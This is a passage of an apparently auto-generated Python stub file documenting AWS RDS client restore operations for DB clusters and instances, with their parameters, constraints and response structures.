    Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :type StorageEncrypted: boolean
    :param StorageEncrypted: Specifies whether the restored DB cluster is encrypted.
    :type KmsKeyId: string
    :param KmsKeyId: The KMS key identifier for an encrypted DB cluster.
    The KMS key identifier is the Amazon Resource Name (ARN) for the KMS encryption key. If you are creating a DB cluster with the same AWS account that owns the KMS encryption key used to encrypt the new DB cluster, then you can use the KMS key alias instead of the ARN for the KMS encryption key.
    If the StorageEncrypted parameter is true, and you do not specify a value for the KmsKeyId parameter, then Amazon RDS will use your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS region.
    :type EnableIAMDatabaseAuthentication: boolean
    :param EnableIAMDatabaseAuthentication: A Boolean value that is true to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts, and otherwise false.
    Default: false
    :type SourceEngine: string
    :param SourceEngine: [REQUIRED]
    The identifier for the database engine that was backed up to create the files stored in the Amazon S3 bucket.
    Valid values: mysql
    :type SourceEngineVersion: string
    :param SourceEngineVersion: [REQUIRED]
    The version of the database that the backup files were created from.
    MySQL version 5.5 and 5.6 are supported.
    Example: 5.6.22
    :type S3BucketName: string
    :param S3BucketName: [REQUIRED]
    The name of the Amazon S3 bucket that contains the data used to create the Amazon Aurora DB cluster.
    :type S3Prefix: string
    :param S3Prefix: The prefix for all of the file names that contain the data used to create the Amazon Aurora DB cluster. If you do not specify a SourceS3Prefix value, then the Amazon Aurora DB cluster is created by using all of the files in the Amazon S3 bucket.
    :type S3IngestionRoleArn: string
    :param S3IngestionRoleArn: [REQUIRED]
    The Amazon Resource Name (ARN) of the AWS Identity and Access Management (IAM) role that authorizes Amazon RDS to access the Amazon S3 bucket on your behalf.
    :rtype: dict
    :return: {
    'DBCluster': {
    'AllocatedStorage': 123,
    'AvailabilityZones': [
    'string',
    ],
    'BackupRetentionPeriod': 123,
    'CharacterSetName': 'string',
    'DatabaseName': 'string',
    'DBClusterIdentifier': 'string',
    'DBClusterParameterGroup': 'string',
    'DBSubnetGroup': 'string',
    'Status': 'string',
    'PercentProgress': 'string',
    'EarliestRestorableTime': datetime(2015, 1, 1),
    'Endpoint': 'string',
    'ReaderEndpoint': 'string',
    'MultiAZ': True|False,
    'Engine': 'string',
    'EngineVersion': 'string',
    'LatestRestorableTime': datetime(2015, 1, 1),
    'Port': 123,
    'MasterUsername': 'string',
    'DBClusterOptionGroupMemberships': [
    {
    'DBClusterOptionGroupName': 'string',
    'Status': 'string'
    },
    ],
    'PreferredBackupWindow': 'string',
    'PreferredMaintenanceWindow': 'string',
    'ReplicationSourceIdentifier': 'string',
    'ReadReplicaIdentifiers': [
    'string',
    ],
    'DBClusterMembers': [
    {
    'DBInstanceIdentifier': 'string',
    'IsClusterWriter': True|False,
    'DBClusterParameterGroupStatus': 'string',
    'PromotionTier': 123
    },
    ],
    'VpcSecurityGroups': [
    {
    'VpcSecurityGroupId': 'string',
    'Status': 'string'
    },
    ],
    'HostedZoneId': 'string',
    'StorageEncrypted': True|False,
    'KmsKeyId': 'string',
    'DbClusterResourceId': 'string',
    'DBClusterArn': 'string',
    'AssociatedRoles': [
    {
    'RoleArn': 'string',
    'Status': 'string'
    },
    ],
    'IAMDatabaseAuthenticationEnabled': True|False,
    'ClusterCreateTime': datetime(2015, 1, 1)
    }
    }
    :returns:
    CreateDBCluster
    DeleteDBCluster
    FailoverDBCluster
    ModifyDBCluster
    RestoreDBClusterFromSnapshot
    RestoreDBClusterToPointInTime
    """
    pass
def restore_db_cluster_from_snapshot(AvailabilityZones=None, DBClusterIdentifier=None, SnapshotIdentifier=None, Engine=None, EngineVersion=None, Port=None, DBSubnetGroupName=None, DatabaseName=None, OptionGroupName=None, VpcSecurityGroupIds=None, Tags=None, KmsKeyId=None, EnableIAMDatabaseAuthentication=None):
    """
    Creates a new DB cluster from a DB cluster snapshot. The target DB cluster is created from the source DB cluster restore point with the same configuration as the original source DB cluster, except that the new DB cluster is created with the default security group.
    For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
    See also: AWS API Documentation
    Examples
    The following example restores an Amazon Aurora DB cluster from a DB cluster snapshot.
    Expected Output:
    :example: response = client.restore_db_cluster_from_snapshot(
    AvailabilityZones=[
    'string',
    ],
    DBClusterIdentifier='string',
    SnapshotIdentifier='string',
    Engine='string',
    EngineVersion='string',
    Port=123,
    DBSubnetGroupName='string',
    DatabaseName='string',
    OptionGroupName='string',
    VpcSecurityGroupIds=[
    'string',
    ],
    Tags=[
    {
    'Key': 'string',
    'Value': 'string'
    },
    ],
    KmsKeyId='string',
    EnableIAMDatabaseAuthentication=True|False
    )
    :type AvailabilityZones: list
    :param AvailabilityZones: Provides the list of EC2 Availability Zones that instances in the restored DB cluster can be created in.
    (string) --
    :type DBClusterIdentifier: string
    :param DBClusterIdentifier: [REQUIRED]
    The name of the DB cluster to create from the DB cluster snapshot. This parameter isn't case-sensitive.
    Constraints:
    Must contain from 1 to 255 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    Example: my-snapshot-id
    :type SnapshotIdentifier: string
    :param SnapshotIdentifier: [REQUIRED]
    The identifier for the DB cluster snapshot to restore from.
    Constraints:
    Must contain from 1 to 63 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type Engine: string
    :param Engine: [REQUIRED]
    The database engine to use for the new DB cluster.
    Default: The same as source
    Constraint: Must be compatible with the engine of the source
    :type EngineVersion: string
    :param EngineVersion: The version of the database engine to use for the new DB cluster.
    :type Port: integer
    :param Port: The port number on which the new DB cluster accepts connections.
    Constraints: Value must be 1150-65535
    Default: The same port as the original DB cluster.
    :type DBSubnetGroupName: string
    :param DBSubnetGroupName: The name of the DB subnet group to use for the new DB cluster.
    Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
    Example: mySubnetgroup
    :type DatabaseName: string
    :param DatabaseName: The database name for the restored DB cluster.
    :type OptionGroupName: string
    :param OptionGroupName: The name of the option group to use for the restored DB cluster.
    :type VpcSecurityGroupIds: list
    :param VpcSecurityGroupIds: A list of VPC security groups that the new DB cluster will belong to.
    (string) --
    :type Tags: list
    :param Tags: The tags to be assigned to the restored DB cluster.
    (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
    Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :type KmsKeyId: string
    :param KmsKeyId: The KMS key identifier to use when restoring an encrypted DB cluster from a DB cluster snapshot.
    The KMS key identifier is the Amazon Resource Name (ARN) for the KMS encryption key. If you are restoring a DB cluster with the same AWS account that owns the KMS encryption key used to encrypt the new DB cluster, then you can use the KMS key alias instead of the ARN for the KMS encryption key.
    If you do not specify a value for the KmsKeyId parameter, then the following will occur:
    If the DB cluster snapshot is encrypted, then the restored DB cluster is encrypted using the KMS key that was used to encrypt the DB cluster snapshot.
    If the DB cluster snapshot is not encrypted, then the restored DB cluster is not encrypted.
    :type EnableIAMDatabaseAuthentication: boolean
    :param EnableIAMDatabaseAuthentication: A Boolean value that is true to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts, and otherwise false.
    Default: false
    :rtype: dict
    :return: {
    'DBCluster': {
    'AllocatedStorage': 123,
    'AvailabilityZones': [
    'string',
    ],
    'BackupRetentionPeriod': 123,
    'CharacterSetName': 'string',
    'DatabaseName': 'string',
    'DBClusterIdentifier': 'string',
    'DBClusterParameterGroup': 'string',
    'DBSubnetGroup': 'string',
    'Status': 'string',
    'PercentProgress': 'string',
    'EarliestRestorableTime': datetime(2015, 1, 1),
    'Endpoint': 'string',
    'ReaderEndpoint': 'string',
    'MultiAZ': True|False,
    'Engine': 'string',
    'EngineVersion': 'string',
    'LatestRestorableTime': datetime(2015, 1, 1),
    'Port': 123,
    'MasterUsername': 'string',
    'DBClusterOptionGroupMemberships': [
    {
    'DBClusterOptionGroupName': 'string',
    'Status': 'string'
    },
    ],
    'PreferredBackupWindow': 'string',
    'PreferredMaintenanceWindow': 'string',
    'ReplicationSourceIdentifier': 'string',
    'ReadReplicaIdentifiers': [
    'string',
    ],
    'DBClusterMembers': [
    {
    'DBInstanceIdentifier': 'string',
    'IsClusterWriter': True|False,
    'DBClusterParameterGroupStatus': 'string',
    'PromotionTier': 123
    },
    ],
    'VpcSecurityGroups': [
    {
    'VpcSecurityGroupId': 'string',
    'Status': 'string'
    },
    ],
    'HostedZoneId': 'string',
    'StorageEncrypted': True|False,
    'KmsKeyId': 'string',
    'DbClusterResourceId': 'string',
    'DBClusterArn': 'string',
    'AssociatedRoles': [
    {
    'RoleArn': 'string',
    'Status': 'string'
    },
    ],
    'IAMDatabaseAuthenticationEnabled': True|False,
    'ClusterCreateTime': datetime(2015, 1, 1)
    }
    }
    :returns:
    CreateDBCluster
    DeleteDBCluster
    FailoverDBCluster
    ModifyDBCluster
    RestoreDBClusterFromSnapshot
    RestoreDBClusterToPointInTime
    """
    pass
def restore_db_cluster_to_point_in_time(DBClusterIdentifier=None, SourceDBClusterIdentifier=None, RestoreToTime=None, UseLatestRestorableTime=None, Port=None, DBSubnetGroupName=None, OptionGroupName=None, VpcSecurityGroupIds=None, Tags=None, KmsKeyId=None, EnableIAMDatabaseAuthentication=None):
    """
    Restores a DB cluster to an arbitrary point in time. Users can restore to any point in time before LatestRestorableTime for up to BackupRetentionPeriod days. The target DB cluster is created from the source DB cluster with the same configuration as the original DB cluster, except that the new DB cluster is created with the default DB security group.
    For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
    See also: AWS API Documentation
    Examples
    The following example restores a DB cluster to a new DB cluster at a point in time from the source DB cluster.
    Expected Output:
    :example: response = client.restore_db_cluster_to_point_in_time(
    DBClusterIdentifier='string',
    SourceDBClusterIdentifier='string',
    RestoreToTime=datetime(2015, 1, 1),
    UseLatestRestorableTime=True|False,
    Port=123,
    DBSubnetGroupName='string',
    OptionGroupName='string',
    VpcSecurityGroupIds=[
    'string',
    ],
    Tags=[
    {
    'Key': 'string',
    'Value': 'string'
    },
    ],
    KmsKeyId='string',
    EnableIAMDatabaseAuthentication=True|False
    )
    :type DBClusterIdentifier: string
    :param DBClusterIdentifier: [REQUIRED]
    The name of the new DB cluster to be created.
    Constraints:
    Must contain from 1 to 63 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type SourceDBClusterIdentifier: string
    :param SourceDBClusterIdentifier: [REQUIRED]
    The identifier of the source DB cluster from which to restore.
    Constraints:
    Must be the identifier of an existing database instance
    Must contain from 1 to 63 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type RestoreToTime: datetime
    :param RestoreToTime: The date and time to restore the DB cluster to.
    Valid Values: Value must be a time in Universal Coordinated Time (UTC) format
    Constraints:
    Must be before the latest restorable time for the DB instance
    Cannot be specified if UseLatestRestorableTime parameter is true
    Example: 2015-03-07T23:45:00Z
    :type UseLatestRestorableTime: boolean
    :param UseLatestRestorableTime: A value that is set to true to restore the DB cluster to the latest restorable backup time, and false otherwise.
    Default: false
    Constraints: Cannot be specified if RestoreToTime parameter is provided.
    :type Port: integer
    :param Port: The port number on which the new DB cluster accepts connections.
    Constraints: Value must be 1150-65535
    Default: The same port as the original DB cluster.
    :type DBSubnetGroupName: string
    :param DBSubnetGroupName: The DB subnet group name to use for the new DB cluster.
    Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
    Example: mySubnetgroup
    :type OptionGroupName: string
    :param OptionGroupName: The name of the option group for the new DB cluster.
    :type VpcSecurityGroupIds: list
    :param VpcSecurityGroupIds: A list of VPC security groups that the new DB cluster belongs to.
    (string) --
    :type Tags: list
    :param Tags: A list of tags.
    (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
    Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can contain only the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :type KmsKeyId: string
    :param KmsKeyId: The KMS key identifier to use when restoring an encrypted DB cluster from an encrypted DB cluster.
    The KMS key identifier is the Amazon Resource Name (ARN) for the KMS encryption key. If you are restoring a DB cluster with the same AWS account that owns the KMS encryption key used to encrypt the new DB cluster, then you can use the KMS key alias instead of the ARN for the KMS encryption key.
    You can restore to a new DB cluster and encrypt the new DB cluster with a KMS key that is different than the KMS key used to encrypt the source DB cluster. The new DB cluster will be encrypted with the KMS key identified by the KmsKeyId parameter.
    If you do not specify a value for the KmsKeyId parameter, then the following will occur:
    If the DB cluster is encrypted, then the restored DB cluster is encrypted using the KMS key that was used to encrypt the source DB cluster.
    If the DB cluster is not encrypted, then the restored DB cluster is not encrypted.
    If DBClusterIdentifier refers to a DB cluster that is not encrypted, then the restore request is rejected.
    :type EnableIAMDatabaseAuthentication: boolean
    :param EnableIAMDatabaseAuthentication: A Boolean value that is true to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts, and otherwise false.
    Default: false
    :rtype: dict
    :return: {
    'DBCluster': {
    'AllocatedStorage': 123,
    'AvailabilityZones': [
    'string',
    ],
    'BackupRetentionPeriod': 123,
    'CharacterSetName': 'string',
    'DatabaseName': 'string',
    'DBClusterIdentifier': 'string',
    'DBClusterParameterGroup': 'string',
    'DBSubnetGroup': 'string',
    'Status': 'string',
    'PercentProgress': 'string',
    'EarliestRestorableTime': datetime(2015, 1, 1),
    'Endpoint': 'string',
    'ReaderEndpoint': 'string',
    'MultiAZ': True|False,
    'Engine': 'string',
    'EngineVersion': 'string',
    'LatestRestorableTime': datetime(2015, 1, 1),
    'Port': 123,
    'MasterUsername': 'string',
    'DBClusterOptionGroupMemberships': [
    {
    'DBClusterOptionGroupName': 'string',
    'Status': 'string'
    },
    ],
    'PreferredBackupWindow': 'string',
    'PreferredMaintenanceWindow': 'string',
    'ReplicationSourceIdentifier': 'string',
    'ReadReplicaIdentifiers': [
    'string',
    ],
    'DBClusterMembers': [
    {
    'DBInstanceIdentifier': 'string',
    'IsClusterWriter': True|False,
    'DBClusterParameterGroupStatus': 'string',
    'PromotionTier': 123
    },
    ],
    'VpcSecurityGroups': [
    {
    'VpcSecurityGroupId': 'string',
    'Status': 'string'
    },
    ],
    'HostedZoneId': 'string',
    'StorageEncrypted': True|False,
    'KmsKeyId': 'string',
    'DbClusterResourceId': 'string',
    'DBClusterArn': 'string',
    'AssociatedRoles': [
    {
    'RoleArn': 'string',
    'Status': 'string'
    },
    ],
    'IAMDatabaseAuthenticationEnabled': True|False,
    'ClusterCreateTime': datetime(2015, 1, 1)
    }
    }
    :returns:
    CreateDBCluster
    DeleteDBCluster
    FailoverDBCluster
    ModifyDBCluster
    RestoreDBClusterFromSnapshot
    RestoreDBClusterToPointInTime
    """
    pass
def restore_db_instance_from_db_snapshot(DBInstanceIdentifier=None, DBSnapshotIdentifier=None, DBInstanceClass=None, Port=None, AvailabilityZone=None, DBSubnetGroupName=None, MultiAZ=None, PubliclyAccessible=None, AutoMinorVersionUpgrade=None, LicenseModel=None, DBName=None, Engine=None, Iops=None, OptionGroupName=None, Tags=None, StorageType=None, TdeCredentialArn=None, TdeCredentialPassword=None, Domain=None, CopyTagsToSnapshot=None, DomainIAMRoleName=None, EnableIAMDatabaseAuthentication=None):
"""
Creates a new DB instance from a DB snapshot. The target database is created from the source database restore point with most of the original configuration with the default security group and the default DB parameter group. By default, the new DB instance is created as a single-AZ deployment except when the instance is a SQL Server instance that has an option group that is associated with mirroring; in this case, the instance becomes a mirrored AZ deployment and not a single-AZ deployment.
If your intent is to replace your original DB instance with the new, restored DB instance, then rename your original DB instance before you call the RestoreDBInstanceFromDBSnapshot action. RDS does not allow two DB instances with the same name. Once you have renamed your original DB instance with a different identifier, then you can pass the original name of the DB instance as the DBInstanceIdentifier in the call to the RestoreDBInstanceFromDBSnapshot action. The result is that you will replace the original DB instance with the DB instance created from the snapshot.
If you are restoring from a shared manual DB snapshot, the DBSnapshotIdentifier must be the ARN of the shared DB snapshot.
See also: AWS API Documentation
:example: response = client.restore_db_instance_from_db_snapshot(
DBInstanceIdentifier='string',
DBSnapshotIdentifier='string',
DBInstanceClass='string',
Port=123,
AvailabilityZone='string',
DBSubnetGroupName='string',
MultiAZ=True|False,
PubliclyAccessible=True|False,
AutoMinorVersionUpgrade=True|False,
LicenseModel='string',
DBName='string',
Engine='string',
Iops=123,
OptionGroupName='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
StorageType='string',
TdeCredentialArn='string',
TdeCredentialPassword='string',
Domain='string',
CopyTagsToSnapshot=True|False,
DomainIAMRoleName='string',
EnableIAMDatabaseAuthentication=True|False
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
Name of the DB instance to create from the DB snapshot. This parameter isn't case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens (1 to 15 for SQL Server)
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
Example: my-snapshot-id
:type DBSnapshotIdentifier: string
:param DBSnapshotIdentifier: [REQUIRED]
The identifier for the DB snapshot to restore from.
Constraints:
Must contain from 1 to 255 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
If you are restoring from a shared manual DB snapshot, the DBSnapshotIdentifier must be the ARN of the shared DB snapshot.
:type DBInstanceClass: string
:param DBInstanceClass: The compute and memory capacity of the Amazon RDS DB instance.
Valid Values: db.t1.micro | db.m1.small | db.m1.medium | db.m1.large | db.m1.xlarge | db.m2.2xlarge | db.m2.4xlarge | db.m3.medium | db.m3.large | db.m3.xlarge | db.m3.2xlarge | db.m4.large | db.m4.xlarge | db.m4.2xlarge | db.m4.4xlarge | db.m4.10xlarge | db.r3.large | db.r3.xlarge | db.r3.2xlarge | db.r3.4xlarge | db.r3.8xlarge | db.t2.micro | db.t2.small | db.t2.medium | db.t2.large
:type Port: integer
:param Port: The port number on which the database accepts connections.
Default: The same port as the original DB instance
Constraints: Value must be 1150-65535
:type AvailabilityZone: string
:param AvailabilityZone: The EC2 Availability Zone that the database instance will be created in.
Default: A random, system-chosen Availability Zone.
Constraint: You cannot specify the AvailabilityZone parameter if the MultiAZ parameter is set to true .
Example: us-east-1a
:type DBSubnetGroupName: string
:param DBSubnetGroupName: The DB subnet group name to use for the new instance.
Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
Example: mySubnetgroup
:type MultiAZ: boolean
:param MultiAZ: Specifies if the DB instance is a Multi-AZ deployment.
Constraint: You cannot specify the AvailabilityZone parameter if the MultiAZ parameter is set to true .
:type PubliclyAccessible: boolean
:param PubliclyAccessible: Specifies the accessibility options for the DB instance. A value of true specifies an Internet-facing instance with a publicly resolvable DNS name, which resolves to a public IP address. A value of false specifies an internal instance with a DNS name that resolves to a private IP address.
Default: The default behavior varies depending on whether a VPC has been requested or not. The following list shows the default behavior in each case.
Default VPC: true
VPC: false
If no DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be publicly accessible. If a specific DB subnet group has been specified as part of the request and the PubliclyAccessible value has not been set, the DB instance will be private.
:type AutoMinorVersionUpgrade: boolean
:param AutoMinorVersionUpgrade: Indicates that minor version upgrades will be applied automatically to the DB instance during the maintenance window.
:type LicenseModel: string
:param LicenseModel: License model information for the restored DB instance.
Default: Same as source.
Valid values: license-included | bring-your-own-license | general-public-license
:type DBName: string
:param DBName: The database name for the restored DB instance.
Note
This parameter doesn't apply to the MySQL, PostgreSQL, or MariaDB engines.
:type Engine: string
:param Engine: The database engine to use for the new instance.
Default: The same as source
Constraint: Must be compatible with the engine of the source. You can restore a MariaDB 10.1 DB instance from a MySQL 5.6 snapshot.
Valid Values: MySQL | mariadb | oracle-se1 | oracle-se | oracle-ee | sqlserver-ee | sqlserver-se | sqlserver-ex | sqlserver-web | postgres | aurora
:type Iops: integer
:param Iops: Specifies the amount of provisioned IOPS for the DB instance, expressed in I/O operations per second. If this parameter is not specified, the IOPS value will be taken from the backup. If this parameter is set to 0, the new instance will be converted to a non-PIOPS instance, which will take additional time, though your DB instance will be available for connections before the conversion starts.
Constraints: Must be an integer greater than 1000.
SQL Server
Setting the IOPS value for the SQL Server database engine is not supported.
:type OptionGroupName: string
:param OptionGroupName: The name of the option group to be used for the restored DB instance.
Permanent options, such as the TDE option for Oracle Advanced Security TDE, cannot be removed from an option group, and that option group cannot be removed from a DB instance once it is associated with a DB instance
:type Tags: list
:param Tags: A list of tags.
(dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
:type StorageType: string
:param StorageType: Specifies the storage type to be associated with the DB instance.
Valid values: standard | gp2 | io1
If you specify io1 , you must also include a value for the Iops parameter.
Default: io1 if the Iops parameter is specified; otherwise standard
:type TdeCredentialArn: string
:param TdeCredentialArn: The ARN from the Key Store with which to associate the instance for TDE encryption.
:type TdeCredentialPassword: string
:param TdeCredentialPassword: The password for the given ARN from the Key Store in order to access the device.
:type Domain: string
:param Domain: Specify the Active Directory Domain to restore the instance in.
:type CopyTagsToSnapshot: boolean
:param CopyTagsToSnapshot: True to copy all tags from the restored DB instance to snapshots of the DB instance; otherwise false. The default is false.
:type DomainIAMRoleName: string
:param DomainIAMRoleName: Specify the name of the IAM role to be used when making API calls to the Directory Service.
:type EnableIAMDatabaseAuthentication: boolean
:param EnableIAMDatabaseAuthentication: True to enable mapping of AWS Identity and Access Management (IAM) accounts to database accounts; otherwise false.
You can enable IAM database authentication for the following database engines
For MySQL 5.6, minor version 5.6.34 or higher
For MySQL 5.7, minor version 5.7.16 or higher
Aurora 5.6 or higher.
Default: false
:rtype: dict
:return: {
'DBInstance': {
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
}
}
:returns:
CreateDBInstance
DeleteDBInstance
ModifyDBInstance
"""
pass
def restore_db_instance_to_point_in_time(SourceDBInstanceIdentifier=None, TargetDBInstanceIdentifier=None, RestoreTime=None, UseLatestRestorableTime=None, DBInstanceClass=None, Port=None, AvailabilityZone=None, DBSubnetGroupName=None, MultiAZ=None, PubliclyAccessible=None, AutoMinorVersionUpgrade=None, LicenseModel=None, DBName=None, Engine=None, Iops=None, OptionGroupName=None, CopyTagsToSnapshot=None, Tags=None, StorageType=None, TdeCredentialArn=None, TdeCredentialPassword=None, Domain=None, DomainIAMRoleName=None, EnableIAMDatabaseAuthentication=None):
"""
Restores a DB instance to an arbitrary point in time. You can restore to any point in time before the time identified by the LatestRestorableTime property. You can restore to a point up to the number of days specified by the BackupRetentionPeriod property.
The target database is created with most of the original configuration, but in a system-selected availability zone, with the default security group, the default subnet group, and the default DB parameter group. By default, the new DB instance is created as a single-AZ deployment except when the instance is a SQL Server instance that has an option group that is associated with mirroring; in this case, the instance becomes a mirrored deployment and not a single-AZ deployment.
See also: AWS API Documentation
:example: response = client.restore_db_instance_to_point_in_time(
SourceDBInstanceIdentifier='string',
TargetDBInstanceIdentifier='string',
RestoreTime=datetime(2015, 1, 1),
UseLatestRestorableTime=True|False,
DBInstanceClass='string',
Port=123,
AvailabilityZone='string',
DBSubnetGroupName='string',
MultiAZ=True|False,
PubliclyAccessible=True|False,
AutoMinorVersionUpgrade=True|False,
LicenseModel='string',
DBName='string',
Engine='string',
Iops=123,
OptionGroupName='string',
CopyTagsToSnapshot=True|False,
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
StorageType='string',
TdeCredentialArn='string',
TdeCredentialPassword='string',
Domain='string',
DomainIAMRoleName='string',
EnableIAMDatabaseAuthentication=True|False
)
:type SourceDBInstanceIdentifier: string
:param SourceDBInstanceIdentifier: [REQUIRED]
The identifier of the source DB instance from which to restore.
Constraints:
Must be the identifier of an existing database instance
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type TargetDBInstanceIdentifier: string
:param TargetDBInstanceIdentifier: [REQUIRED]
The name of the new database instance to be created.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type RestoreTime: datetime
:param RestoreTime: The date and time to restore from.
Valid Values: Value must be a time in Universal Coordinated Time (UTC) format
Constraints:
Must be before the latest restorable time for the DB instance
Cannot be specified if UseLatestRestorableTime parameter is true
Example: 2009-09-07T23:45:00Z
:type UseLatestRestorableTime: boolean
:param UseLatestRestorableTime: Specifies whether (true ) or not (false ) the DB instance is restored from the latest backup time.
Default: false
Constraints: Cannot be specified if RestoreTime parameter is provided.
:type DBInstanceClass: string
:param DBInstanceClass: The compute and memory capacity of the Amazon RDS DB instance.
Valid Values: db.t1.micro | db.m1.small | db.m1.medium | db.m1.large | db.m1.xlarge | db.m2.2xlarge | db.m2.4xlarge | db.m3.medium | db.m3.large | db.m3.xlarge | db.m3.2xlarge | db.m4.large | db.m4.xlarge | db.m4.2xlarge | db.m4.4xlarge | db.m4.10xlarge | db.r3.large | db.r3.xlarge | db.r3.2xlarge | db.r3.4xlarge | db.r3.8xlarge | db.t2.micro | db.t2.small | db.t2.medium | db.t2.large
Default: The same DBInstanceClass as the original DB instance.
:type Port: integer
:param Port: The port number on which the database accepts connections.
Constraints: Value must be 1150-65535
Default: The same port as the original DB instance.
:type AvailabilityZone: string
:param AvailabilityZone: The EC2 Availability Zone that the database instance will be created in.
